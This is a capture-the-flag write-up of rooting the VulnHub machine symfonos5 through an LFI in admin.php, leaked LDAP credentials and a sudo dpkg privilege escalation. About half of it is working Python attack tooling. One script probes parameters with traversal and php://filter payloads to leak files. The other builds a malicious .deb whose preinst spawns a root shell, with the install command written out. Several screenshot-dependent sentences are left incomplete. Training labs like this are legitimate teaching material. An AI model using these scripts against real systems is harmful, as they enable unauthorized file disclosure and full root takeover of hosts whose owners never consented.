Description:
This is an easy, realistic machine from VulnHub, designed to teach the importance of understanding how an application works from the inside.
It has an LFI that lets an attacker read files, which leads to the credentials of a user who can run dpkg as root!
Let's find out how to get root on this machine.
You can download the machine from here!
[1] Information gathering:
We start by scanning all ports and identifying the services running on them with nmap and a few of its options.
# Nmap 7.80 scan initiated Tue Feb 25 17:57:47 2020 as: nmap -sV -sC -A -p- -oA nmap symfonos5.vh
Nmap scan report for symfonos5.vh (192.168.43.173)
Host is up (0.00036s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
| 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_ 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
636/tcp open ldapssl?
MAC Address: 08:00:27:1E:87:84 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms symfonos5.vh (192.168.43.173)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 25 17:59:02 2020 -- 1 IP address (1 host up) scanned in 75.44 seconds
I visited http://symfonos5.vh/ and all I found was
So I used gobuster to brute-force files and directories.
It turned up an interesting login page at /admin.php.
[2] Scanning:
I tested this login page against the usual injection payloads, but none of them worked.
I opened Burp to intercept the requests and read the responses, and I found something interesting:
Yup! One parameter takes a file location, which can lead to LFI, so I tested this by trying to read /etc/passwd:
[3] Exploitation:
I used this bug to read /admin.php itself, and since the file came back as source rather than being executed, it revealed the LDAP credentials.
LDAP (389/tcp) is open on this machine, and enumerating it needs valid credentials, which we now have! So I searched for an nmap script to enumerate LDAP and found this one:
I opened ldap-search.nse; its usage is as follows:
I ran it and it returned the password and some details for the user zeus.
I SSHed in with these credentials and it worked; we now have a shell as that user.
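The LFI test above (reading /etc/passwd, then admin.php) is easy to put into a small script. This is an added example, not code from the original post: the post never names the vulnerable parameter, so the target URL and parameter name are assumptions passed in by the caller, and the sample responses at the bottom are constructed for an offline check, not captured from the box. It also goes slightly beyond the post: besides the plain absolute path it tries ../ traversal and php://filter, which is what you need when the sink is include() and a .php file would otherwise be executed instead of shown.

```python
#!/usr/bin/env python3
"""Probe a suspected file-inclusion parameter and confirm a leak.

Added example for this write-up, not the post's own code. The target URL
and parameter name are assumptions supplied by the caller.
"""
import base64
import re
import urllib.parse
import urllib.request

# Every Linux /etc/passwd contains the root entry "root:x:0:0:..." (or with a
# hash instead of x), so this is a reliable fingerprint of a successful read.
PASSWD_RE = re.compile(r"root:[^:\n]*:0:0:")


def lfi_payloads(path="/etc/passwd", max_depth=6):
    """Candidate values for the parameter, in the order worth trying:
    1. the absolute path (sink is file_get_contents/readfile/include with no prefix);
    2. '../' traversal at increasing depth (sink prepends a directory);
    3. php://filter with base64 (sink is include/require, which would execute
       a .php target instead of returning its source).
    """
    rel = path.lstrip("/")
    payloads = [path]
    payloads += ["../" * depth + rel for depth in range(1, max_depth + 1)]
    payloads.append("php://filter/convert.base64-encode/resource=" + path)
    return payloads


def leaks_passwd(body):
    """True if the body contains /etc/passwd verbatim or as a base64 blob
    (the php://filter case)."""
    if PASSWD_RE.search(body):
        return True
    for blob in re.findall(r"[A-Za-z0-9+/=]{40,}", body):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue
        if PASSWD_RE.search(decoded):
            return True
    return False


def probe(url, param, payloads=None, timeout=5):
    """Send each payload as ?param=value; return the first value that leaks
    /etc/passwd, or None. Needs network access to the target."""
    for value in payloads or lfi_payloads():
        full = url + "?" + urllib.parse.urlencode({param: value})
        try:
            with urllib.request.urlopen(full, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
        except OSError:
            continue
        if leaks_passwd(body):
            return value
    return None


# Constructed sample responses for the offline check (not captured from the box).
SAMPLE_LEAK = ("<html><body>root:x:0:0:root:/root:/bin/bash\n"
               "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n</body></html>")
SAMPLE_B64 = ("<pre> " + base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()
              + " </pre>")
SAMPLE_CLEAN = "<html><body><form>Login</form></body></html>"

if __name__ == "__main__":
    # Hypothetical target and parameter name; replace with the real ones.
    print(probe("http://symfonos5.vh/admin.php", "file"))
```

Once a payload works, swap the path for admin.php (or any other file the web server can read) and reuse the same check; if only the php://filter variant succeeds, the sink is an include and the base64 must be decoded before the source is readable.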
[4] Privilege escalation:
Zeus can run dpkg as root, which means zeus can install any package, and dpkg runs a package's maintainer scripts (preinst, postinst) as root during installation, so a crafted package is effectively a root shell.
After some searching I found this:
But I didn't have fpm installed on my machine, so I installed it on another machine, created a package called x containing a shell, and copied it over to the symfonos5 machine.
On the symfonos5 machine I downloaded that package with wget:
Then I ran the command as root via sudo, and it gave me a root shell; the proof is as follows:
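The fpm step above can be skipped entirely, because a .deb is just an ar archive holding debian-binary, control.tar.gz and data.tar.gz, in the layout dpkg-deb writes. The script below is an added example for this write-up, not code from the original post, from fpm or from the box: it builds the same kind of package with nothing but the Python standard library, so it runs on any attacking machine. Assumptions: the package is named x, the hook is preinst (what fpm's --before-install produces) and the payload is a placeholder exec /bin/sh.

```python
#!/usr/bin/env python3
"""Build a minimal .deb whose maintainer script runs as root at install time.

Added example, not the post's own code. Package name "x", preinst hook and
the "exec /bin/sh" payload are assumptions chosen for the demonstration.
"""
import io
import tarfile

CONTROL = """Package: x
Version: 1.0
Architecture: all
Maintainer: nobody <nobody@example.invalid>
Description: demonstration package; preinst runs as root under dpkg -i
"""

# dpkg executes this as root before unpacking the (empty) payload.
PREINST = "#!/bin/sh\nexec /bin/sh\n"


def _tar_gz(members):
    """gzip'd tar of (name, data, mode); data=None means a directory entry."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data, mode in members:
            info = tarfile.TarInfo(name)
            info.mode = mode
            info.mtime = 0
            if data is None:
                info.type = tarfile.DIRTYPE
                tar.addfile(info)
            else:
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _ar_member(name, data):
    """One member of a classic (common) ar archive: 60-byte header, data,
    padded to an even length, the same format dpkg-deb writes."""
    header = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def build_deb(preinst=PREINST, control=CONTROL):
    """Return the bytes of a .deb carrying the given control file and preinst."""
    control_tgz = _tar_gz([
        ("./control", control.encode(), 0o644),
        ("./preinst", preinst.encode(), 0o755),  # must be executable
    ])
    data_tgz = _tar_gz([("./", None, 0o755)])     # installs no files at all
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control_tgz)
            + _ar_member("data.tar.gz", data_tgz))


def ar_members(blob):
    """Parse an ar archive back into [(name, bytes)] to check the result."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos, out = 8, []
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        name = hdr[:16].decode().rstrip(" /")
        size = int(hdr[48:58])
        out.append((name, blob[pos + 60:pos + 60 + size]))
        pos += 60 + size + (size % 2)
    return out


def control_scripts(blob):
    """Return {member: (mode, bytes)} for the files inside control.tar.gz."""
    members = dict(ar_members(blob))
    with tarfile.open(fileobj=io.BytesIO(members["control.tar.gz"]), mode="r:gz") as tar:
        return {m.name: (m.mode, tar.extractfile(m).read())
                for m in tar.getmembers() if m.isfile()}


if __name__ == "__main__":
    with open("x.deb", "wb") as f:
        f.write(build_deb())
    # On the target, after transferring x.deb:  sudo dpkg -i x.deb
```

dpkg runs preinst before it unpacks anything, so the shell appears even if the install would fail later, and the package leaves nothing on disk that a later dpkg -r would need to clean up. The defensive reading is the same point in reverse: a sudo rule for dpkg (or apt, pip, or any other installer that runs hook scripts) is a root grant, not a limited one.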
Finally, thank you, and I hope you learned something new!
For any questions, you can find me on: